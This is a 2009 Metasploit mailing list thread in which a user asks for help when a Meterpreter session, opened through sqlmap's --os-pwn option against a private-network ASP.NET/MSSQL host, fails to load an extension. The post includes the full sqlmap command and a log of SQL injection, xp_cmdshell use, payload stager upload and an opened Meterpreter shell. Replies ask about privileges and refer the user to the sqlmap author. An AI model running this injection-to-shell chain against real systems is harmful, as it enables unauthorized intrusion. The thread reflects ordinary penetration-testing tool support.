Metasploit mailing list archives
Meterpreter and sqlmap?
From: etlownoise at gmail.com (Efrain Torres)
Date: Sat, 2 May 2009 13:53:18 -0500
Osman, Please contact sqlmap author bernardo.damele at gmail.com as it appears your problem is not related to running sqlmap IN metasploit. 2009/5/1 Carlos P?rez <carlos_perez at darkoperator.com>:
Under what privileges is the database service running under on the target machine? Sent from my iPhone On May 1, 2009, at 5:58 PM, OSMAN ELSAHIB <elsahib10 at hotmail.com> wrote: hello everyone, i'm getting a very weird problem when running Metasploit with SQLMAP 0.7 on a Ubuntu machine ( Sun VirtualBox), any ideas? ========================================================================= root at osman-laptop:/home/User/Desktop/sqlmap# python sqlmap.py -u "http://192.168.0.12/test.aspx?id=3" --os-pwn --msf-path=/home/osman/metasploit ??? sqlmap/0.7rc1 ??? by Bernardo Damele A. G. <bernardo.damele at gmail.com> [*] starting at: 00:36:29 [00:36:29] [INFO] testing connection to the target url [00:36:32] [INFO] testing if the url is stable, wait a few seconds [00:36:38] [INFO] url is stable [00:36:38] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic [00:36:45] [WARNING] User-Agent parameter 'User-Agent' is not dynamic [00:36:45] [INFO] testing if Cookie parameter 'ASP.NET_SessionId' is dynamic [00:36:52] [WARNING] Cookie parameter 'ASP.NE T_SessionId' is not dynamic [00:36:52] [INFO] testing if GET parameter 'id' is dynamic [00:36:59] [INFO] confirming that GET parameter 'id' is dynamic [00:37:15] [INFO] GET parameter 'id' is dynamic [00:37:15] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis [00:37:15] [INFO] testing unescaped numeric injection on GET parameter 'id' [00:37:29] [INFO] confirming unescaped numeric injection on GET parameter 'id' [00:37:36] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis [00:37:36] [INFO] testing for parenthesis on injectable parameter [00:38:02] [INFO] the injectable parameter requires 0 parenthesis [00:38:02] [INFO] testing MySQL [00:38:11] [WARNING] the back-end DMBS is not MySQL [00:38:11] [INFO] testing Oracle [00:38:20] [WARNING] the back-end DMBS is not Oracle [00:38:20] [INFO] testing PostgreSQL [00:38:27] [WARNING] the back-end DMBS is not PostgreSQL [00:38:27] [INFO] test ing Microsoft SQL Server [00:38:36] [INFO] confirming Microsoft SQL Server [00:39:01] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322 back-end DBMS: Microsoft SQL Server [00:39:01] [INFO] testing stacked queries support on parameter 'id' [00:39:13] [INFO] the web application supports stacked queries on parameter 'id' [00:39:13] [INFO] testing if current user is DBA [00:39:13] [INFO] retrieved: 0 [00:39:44] [WARNING] the functionality requested might not work because the session user is not a database administrator [00:39:44] [INFO] checking if xp_cmdshell extended procedure is available, wait.. [00:39:50] [INFO] xp_cmdshell extended procedure is available [00:40:03] [INFO] creating Metasploit Framework 3 payload stager which connection type do you want to use? [1] Bind TCP (default) [2] Bind TCP (No N X) [3] Reverse TCP [4] Reverse TCP (No NX)2which is the back-end DBMS address? [192.168.0.12] which remote port numer do you want to use? [16882] 21 which payload do you want to use? [1] Meterpreter (default) [2] Shell [3] VNC1which payload encoding do you want to use? [1] No Encoder [2] Alpha2 Alphanumeric Mixedcase Encoder [3] Alpha2 Alphanumeric Uppercase Encoder [4] Avoid UTF8/tolower [5] Call+4 Dword XOR Encoder [6] Single-byte XOR Countdown Encoder [7] Variable-length Fnstenv/mov Dword XOR Encoder [8] Polymorphic Jump/Call XOR Additive Feedback Encoder [9] Non-Alpha Encoder [10] Non-Upper Encoder [11] Polymorphic XOR Additive Feedback Encoder (default) [12] Alpha2 Alphanumeric Unicode Mixedcase Encoder [13] Alpha2 Alphanumeric Unicode Uppercase Encoder11[00:40:23] [INFO] creation in progress ................ done [00:40:40] [INFO] compression in progress . done [00 :40:41] [INFO] uploading payload stager to 'C:/WINDOWS/Temp/sqlmapmsfrerje.exe' [00:41:23] [INFO] running Metasploit Framework 3 command line interface locally, wait.. [00:41:23] [INFO] running Metasploit Framework 3 payload stager remotely, wait.. [*] Please wait while we load the module tree... [*] Started bind handler [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(191 bytes) [*] Sending stage (2650 bytes) [*] Sleeping before handling stage... [*] Uploading DLL (75787 bytes)... [*] Upload completed. [*] Meterpreter session 1 opened (192.168.0.4:50577 -> 192.168.0.12:21) meterpreter > Loading extension priv...[-] failure: Interrupted system call /home/osman/metasploit/lib/rex/io/stream.rb:40:in `syswrite' /home/osman/metasploit/lib/rex/io/stream.rb:40:in `write' /home/osman/metasploit/lib/rex/post/meterpreter/packet_dispatcher.rb:59:in `send_packet' /home/osman/metas ploit/lib/rex/post/meterpreter/packet_dispatcher.rb:92:in `send_packet_wait_response' /home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb:115:in `load_library' /home/osman/metasploit/lib/rex/post/meterpreter/client_core.rb:157:in `use' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:254:in `cmd_use' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:242:in `each' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:242:in `cmd_use' /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `send' /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:234:in `run_command' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:94:in `run_command' /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:196:in `run_single' /home/osman/metasploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `each' /home/osman/meta sploit/lib/rex/ui/text/dispatcher_shell.rb:191:in `run_single' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:60:in `interact' /home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `call' /home/osman/metasploit/lib/rex/ui/text/shell.rb:123:in `run' /home/osman/metasploit/lib/rex/post/meterpreter/ui/console.rb:58:in `interact' /home/osman/metasploit/lib/msf/base/sessions/meterpreter.rb:181:in `_interact' /home/osman/metasploit/lib/rex/ui/interactive.rb:48:in `interact' /home/osman/metasploit/msfcli:246 meterpreter > run winenum [*] Running Windows Local Enumerion Meterpreter Script [*] New session on 192.168.0.12:21... [-] Error in script: undefined method `config' for nil:NilClass ============================================================================== Elsahib ________________________________ check out the rest of the Windows Live?. More than mail?Windows Live? goes way beyond your inbox. More than messages _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Meterpreter and sqlmap? OSMAN ELSAHIB (May 01)
- Meterpreter and sqlmap? Carlos PĂ©rez (May 01)
- Meterpreter and sqlmap? Efrain Torres (May 02)
- Meterpreter and sqlmap? Carlos PĂ©rez (May 01)